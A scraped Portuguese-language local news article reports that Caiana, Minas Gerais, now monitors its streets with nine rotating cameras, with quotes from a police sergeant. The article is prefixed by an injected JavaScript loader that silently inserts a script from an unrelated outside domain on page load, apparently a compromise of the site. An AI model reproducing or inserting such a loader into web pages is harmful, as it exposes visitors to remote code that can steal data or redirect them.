;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ruas de Caiana passam a ser monitoradas por câmeras. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ruas de Caiana passam a ser monitoradas por câmeras.

CAIANA (MG) – As ruas de Caiana agora contam com um elemento de prevenção de crimes a mais: todas as vias de entrada e saída de pessoas da cidade estão sendo monitoradas por câmeras giratórias de alta resolução. Além disso, os principais pontos dentro da cidade também são monitorados 24 horas por dia.
A ideia surgiu em Dezembro de 2013, logo quando o Sargento Gladson Garcia foi designado a trabalhar na cidade naquele ano. O então Sargento buscou parceria com a prefeitura e expôs a ideia de monitorar toda a cidade ressaltando o custo beneficio que traria para Caiana. A prefeitura abraçou o projeto e a partir de então foi realizada uma licitação para a compra de equipamentos e o molde de como seriam projetadas essas câmeras.
O sargento Garcia ressalta, inclusive, o apoio também da empresa de internet Acesse Rádio Comunicação e da loja de material de construção Construminas, que foram de suma importância para a concretização final do projeto. Cerca de um ano se passou entre a concepção e finalização, que ocorreu agora no primeiro semestre de 2015.
A reportagem verificou o funcionamento das câmeras e constatou a precisão dos equipamentos. Ao todo são nove câmeras que giram em 360º gravando tudo que acontece a centenas de metros de distância. O zoom das câmeras é tão preciso que é possível puxar a angulação e verificar com perfeição um matinho ou uma ponta de cigarro jogada ao chão.
O sargento Garcia ainda esclarece que dos 24 municípios que compõem o batalhão de Manhuaçu, Caiana é a segunda cidade a ser monitorada por câmeras, porém, a primeira com 100% de qualidade. Sobre o custo total do projeto o Sargento não soube precisar, mas acredita que tenha ficado em torno de R$ 50.000,00.
Com o funcionamento integral do equipamento o índice de criminalidade urbana passou a ser de 0%, acrescenta o Sargento.

Informação e fotos: Portal Espera Feliz

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.